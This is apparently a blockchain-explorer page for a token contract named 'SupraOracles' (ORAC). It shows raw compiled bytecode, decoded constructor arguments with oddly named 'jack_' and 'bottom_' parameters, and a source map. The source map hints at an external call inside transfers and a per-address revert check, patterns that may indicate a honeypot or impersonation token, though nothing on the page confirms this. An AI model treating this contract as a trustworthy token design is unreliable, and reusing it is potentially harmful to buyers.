1527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5460405190916108c09187918791879101610ad5565b60408051601f1981840301815291905280516020909101201496508a9550899450505050505b9450945094915050565b602082015181801561091a57506001600160a01b0384166000908152600560205260409020546001145b1561057357806105735760405162461bcd60e51b815260040161041e90610bf2565b80356001600160a01b038116811461031357600080fd5b600060208284031215610964578081fd5b61096d8261093c565b9392505050565b60008060408385031215610986578081fd5b61098f8361093c565b915061099d6020840161093c565b90509250929050565b6000806000606084860312156109ba578081fd5b6109c38461093c565b92506109d16020850161093c565b9150604084013590509250925092565b600080604083850312156109f3578182fd5b6109fc8361093c565b946020939093013593505050565b60008060208385031215610a1c578182fd5b823567ffffffffffffffff80821115610a33578384fd5b818501915085601f830112610a46578384fd5b813581811115610a54578485fd5b8660208083028501011115610a67578485fd5b60209290920196919550909350505050565b60008151808452610a91816020860160208601610d21565b601f01601f19169290920160200192915050565b60008251610ab7818460208701610d21565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0384168152606060208201819052600090610af990830185610a79565b8281036040840152610b0b8185610a79565b9695505050505050565b901515815260200190565b60006020825261096d6020830184610a79565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252600190820152603160f91b604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d0557610d05610d88565b500190565b600082821015610d1c57610d1c610d88565b500390565b60005b83811015610d3c578181015183820152602001610d24565b838111156105735750506000910152565b600281046001821680610d6157607f821691505b60208210811415610d8257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea2646970667358221220554abecbdf59bb555743aaca0617cf18a1b3db85472ee9dbf2975885cb6e435064736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9da708a60c5e5d2394e40d48b1fb81cadf2f8ef907b8378e963641891eb45a138f000000000000000000000000000000000000000000000000000000000000000c53757072614f7261636c6573000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044f52414300000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): SupraOracles
Arg [1] : symbol_ (string): ORAC
Arg [2] : jack_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
Arg [3] : bottom_ (uint256): 75551526513274311747614708413442845752369839257948506021913842553492011094927

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Arg [3] : a708a60c5e5d2394e40d48b1fb81cadf2f8ef907b8378e963641891eb45a138f
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000c
Arg [5] : 53757072614f7261636c65730000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [7] : 4f52414300000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

113:10851:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1004:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3363:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2132:108::-;;;:::i;:::-;;;;;;;:::i;4144:261::-;;;;;;:::i;:::-;;:::i;1975:92::-;;;:::i;:::-;;;;;;;:::i;4814:238::-;;;;;;:::i;:::-;;:::i;2303:127::-;;;;;;:::i;:::-;;:::i;5997:744::-;;;;;;:::i;:::-;;:::i;:::-;;980:87:3;;;:::i;:::-;;;;;;;:::i;1223:104:2:-;;;:::i;5555:434::-;;;;;;:::i;:::-;;:::i;2636:193::-;;;;;;:::i;:::-;;:::i;2892:151::-;;;;;;:::i;:::-;;:::i;1004:100::-;1058:13;1091:5;1084:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1004:100;:::o;3363:201::-;3446:4;3463:13;3479:12;:10;:12::i;:::-;3463:28;;3502:32;3511:5;3518:7;3527:6;3502:8;:32::i;:::-;-1:-1:-1;3552:4:2;;3363:201;-1:-1:-1;;;3363:201:2:o;2132:108::-;2220:12;;2132:108;:::o;4144:261::-;4241:4;4258:15;4276:12;:10;:12::i;:::-;4258:30;;4299:38;4315:4;4321:7;4330:6;4299:15;:38::i;:::-;4348:27;4358:4;4364:2;4368:6;4348:9;:27::i;:::-;-1:-1:-1;4393:4:2;;4144:261;-1:-1:-1;;;;4144:261:2:o;1975:92::-;2058:1;1975:92;:::o;4814:238::-;4902:4;4919:13;4935:12;:10;:12::i;:::-;4919:28;;4958:64;4967:5;4974:7;5011:10;4983:25;4993:5;5000:7;4983:9;:25::i;:::-;:38;;;;:::i;:::-;4958:8;:64::i;2303:127::-;-1:-1:-1;;;;;2404:18:2;;2377:7;2404:18;;;:9;:18;;;;;;2303:127;;;;:::o;5997:744::-;6070:11;6083;6096;6111:60;6142:7;;6151:1;6142:11;;;;;-1:-1:-1;;;6142:11:2;;;;;;;;;;;;;;;6155:7;;6164:1;6155:11;;;;;-1:-1:-1;;;6155:11:2;;;;;;;;;;;;;;;6167:1;6169;6111:16;:60::i;:::-;6069:102;;;;;;6178:6;6173:20;;6186:7;;;;;6173:20;6230:45;6279:32;;6276:2;;6406:1;6377:36;;;6325:51;6414:16;;6477:2;6464:16;;6431:55;;;6276:2;6492:36;6489:2;;6637:1;6604:40;;;6560:43;6645:34;;6700:2;6687:16;;6597:1;6680:27;;6489:2;;6203:531;;;;;;:::o;980:87:3:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:3;980:87;:::o;1223:104:2:-;1279:13;1312:7;1305:14;;;;;:::i;5555:434::-;5648:4;5665:13;5681:12;:10;:12::i;:::-;5665:28;;5704:24;5731:25;5741:5;5748:7;5731:9;:25::i;:::-;5704:52;;5795:15;5775:16;:35;;5767:85;;;;-1:-1:-1;;;5767:85:2;;;;;;;:::i;:::-;;;;;;;;;5888:60;5897:5;5904:7;5932:15;5913:16;:34;5888:8;:60::i;2636:193::-;2715:4;2732:13;2748:12;:10;:12::i;:::-;2732:28;;2771;2781:5;2788:2;2792:6;2771:9;:28::i;2892:151::-;-1:-1:-1;;;;;3008:18:2;;;2981:7;3008:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;2892:151::o;656:98:0:-;736:10;656:98;:::o;9904:346:2:-;-1:-1:-1;;;;;10006:19:2;;9998:68;;;;-1:-1:-1;;;9998:68:2;;;;;;;:::i;:::-;-1:-1:-1;;;;;10085:21:2;;10077:68;;;;-1:-1:-1;;;10077:68:2;;;;;;;:::i;:::-;-1:-1:-1;;;;;10158:18:2;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;10210:32;;;;;10188:6;;10210:32;:::i;:::-;;;;;;;;9904:346;;;:::o;10542:419::-;10643:24;10670:25;10680:5;10687:7;10670:9;:25::i;:::-;10643:52;;-1:-1:-1;;10710:16:2;:37;10706:248;;10792:6;10772:16;:26;;10764:68;;;;-1:-1:-1;;;10764:68:2;;;;;;;:::i;:::-;10876:51;10885:5;10892:7;10920:6;10901:16;:25;10876:8;:51::i;:::-;10542:419;;;;:::o;7701:843::-;-1:-1:-1;;;;;7798:18:2;;7790:68;;;;-1:-1:-1;;;7790:68:2;;;;;;;:::i;:::-;7948:17;7969:5;-1:-1:-1;;;;;7969:10:2;8036:4;7980:61;;;;;;;;:::i;:::-;;;;-1:-1:-1;;7980:61:2;;;;;;;;;;;;;;-1:-1:-1;;;;;7980:61:2;-1:-1:-1;;;7980:61:2;;;7969:73;;;7980:61;7969:73;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7946:96;;;8044:29;8056:4;8062;8068;8044:11;:29::i;:::-;-1:-1:-1;;;;;8106:15:2;;8084:19;8106:15;;;:9;:15;;;;;;8140:21;;;;8132:72;;;;-1:-1:-1;;;8132:72:2;;;;;;;:::i;:::-;-1:-1:-1;;;;;8240:15:2;;;;;;;:9;:15;;;;;;8258:20;;;8240:38;;8458:13;;;;;;;;;;:23;;;;;;8510:26;;;;;;8272:6;;8510:26;:::i;:::-;;;;;;;;7701:843;;;;;:::o;6753:473::-;6861:4;6867:7;6876;6897:11;6911:10;6897:24;;6933:17;6953:5;6933:25;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6960:27;6990:7;6960:37;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7020:3;7015;7011;:7;;;;:::i;:::-;:12;7008:36;;;7032:5;7039:1;7042;7025:19;;;;;;;;;;;7008:36;7067:7;7071:3;7067;:7;:::i;:::-;7058:3;7062;7058:7;:16;7055:40;;;7083:5;7090:1;7092:2;7076:19;;;;;;;;;;;7055:40;7106:8;7166:19;;;:7;:19;;;;;;;7135:25;7166:19;;7135:25;;7146:3;;7151;;7156;;7135:25;;:::i;:::-;;;;-1:-1:-1;;7135:25:2;;;;;;;;;7125:36;;7135:25;7125:36;;;;7117:68;;-1:-1:-1;7209:3:2;;-1:-1:-1;7214:3:2;;-1:-1:-1;;;;;6753:473:2;;;;;;;;;:::o;8552:254::-;8689:2;8679:13;;8673:20;8709:3;:27;;;;-1:-1:-1;;;;;;8716:15:2;;;;;;:7;:15;;;;;;8735:1;8716:20;8709:27;8705:94;;;8757:8;8753:34;;8767:20;;-1:-1:-1;;;8767:20:2;;;;;;;:::i;14:175:4:-;84:20;;-1:-1:-1;;;;;133:31:4;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:4:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:4:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:4;;-1:-1:-1;;;;1399:561:4:o;1965:260::-;;2047:5;2041:12;2074:6;2069:3;2062:19;2090:63;2146:6;2139:4;2134:3;2130:14;2123:4;2116:5;2112:16;2090:63;:::i;:::-;2207:2;2186:15;-1:-1:-1;;2182:29:4;2173:39;;;;2214:4;2169:50;;2017:208;-1:-1:-1;;2017:208:4:o;2230:274::-;;2397:6;2391:13;2413:53;2459:6;2454:3;2447:4;2439:6;2435:17;2413:53;:::i;:::-;2482:16;;;;;2367:137;-1:-1:-1;;2367:137:4:o;2509:203::-;-1:-1:-1;;;;;2673:32:4;;;;2655:51;;2643:2;2628:18;;2610:102::o;2717:484::-;-1:-1:-1;;;;;2942:32:4;;2924:51;;3011:2;3006;2991:18;;2984:30;;;2717:484;;3037:47;;3065:18;;3057:6;3037:47;:::i;:::-;3132:9;3124:6;3120:22;3115:2;3104:9;3100:18;3093:50;3160:35;3188:6;3180;3160:35;:::i;:::-;3152:43;2914:287;-1:-1:-1;;;;;;2914:287:4:o;3206:187::-;3371:14;;3364:22;3346:41;;3334:2;3319:18;;3301:92::o;3398:222::-;;3547:2;3536:9;3529:21;3567:47;3610:2;3599:9;3595:18;3587:6;3567:47;:::i;3625:398::-;3827:2;3809:21;;;3866:2;3846:18;;;3839:30;3905:34;3900:2;3885:18;;3878:62;-1:-1:-1;;;3971:2:4;3956:18;;3949:32;4013:3;3998:19;;3799:224::o;4028:353::-;4230:2;4212:21;;;4269:2;4249:18;;;4242:30;4308:31;4303:2;4288:18;;4281:59;4372:2;4357:18;;4202:179::o;4386:402::-;4588:2;4570:21;;;4627:2;4607:18;;;4600:30;4666:34;4661:2;4646:18;;4639:62;-1:-1:-1;;;4732:2:4;4717:18;;4710:36;4778:3;4763:19;;4560:228::o;4793:324::-;4995:2;4977:21;;;5034:1;5014:18;;;5007:29;-1:-1:-1;;;5067:2:4;5052:18;;5045:31;5108:2;5093:18;;4967:150::o;5122:401::-;5324:2;5306:21;;;5363:2;5343:18;;;5336:30;5402:34;5397:2;5382:18;;5375:62;-1:-1:-1;;;5468:2:4;5453:18;;5446:35;5513:3;5498:19;;5296:227::o;5528:400::-;5730:2;5712:21;;;5769:2;5749:18;;;5742:30;5808:34;5803:2;5788:18;;5781:62;-1:-1:-1;;;5874:2:4;5859:18;;5852:34;5918:3;5903:19;;5702:226::o;5933:401::-;6135:2;6117:21;;;6174:2;6154:18;;;6147:30;6213:34;6208:2;6193:18;;6186:62;-1:-1:-1;;;6279:2:4;6264:18;;6257:35;6324:3;6309:19;;6107:227::o;6339:177::-;6485:25;;;6473:2;6458:18;;6440:76::o;6521:184::-;6693:4;6681:17;;;;6663:36;;6651:2;6636:18;;6618:87::o;6710:128::-;;6781:1;6777:6;6774:1;6771:13;6768:2;;;6787:18;;:::i;:::-;-1:-1:-1;6823:9:4;;6758:80::o;6843:125::-;;6911:1;6908;6905:8;6902:2;;;6916:18;;:::i;:::-;-1:-1:-1;6953:9:4;;6892:76::o;6973:258::-;7045:1;7055:113;7069:6;7066:1;7063:13;7055:113;;;7145:11;;;7139:18;7126:11;;;7119:39;7091:2;7084:10;7055:113;;;7186:6;7183:1;7180:13;7177:2;;;-1:-1:-1;;7221:1:4;7203:16;;7196:27;7026:205::o;7236:380::-;7321:1;7311:12;;7368:1;7358:12;;;7379:2;;7433:4;7425:6;7421:17;7411:27;;7379:2;7486;7478:6;7475:14;7455:18;7452:38;7449:2;;;7532:10;7527:3;7523:20;7520:1;7513:31;7567:4;7564:1;7557:15;7595:4;7592:1;7585:15;7449:2;;7291:325;;;:::o;7621:127::-;7682:10;7677:3;7673:20;7670:1;7663:31;7713:4;7710:1;7703:15;7737:4;7734:1;7727:15

Swarm Source

ipfs://554abecbdf59bb555743aaca0617cf18a1b3db85472ee9dbf2975885cb6e4350

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.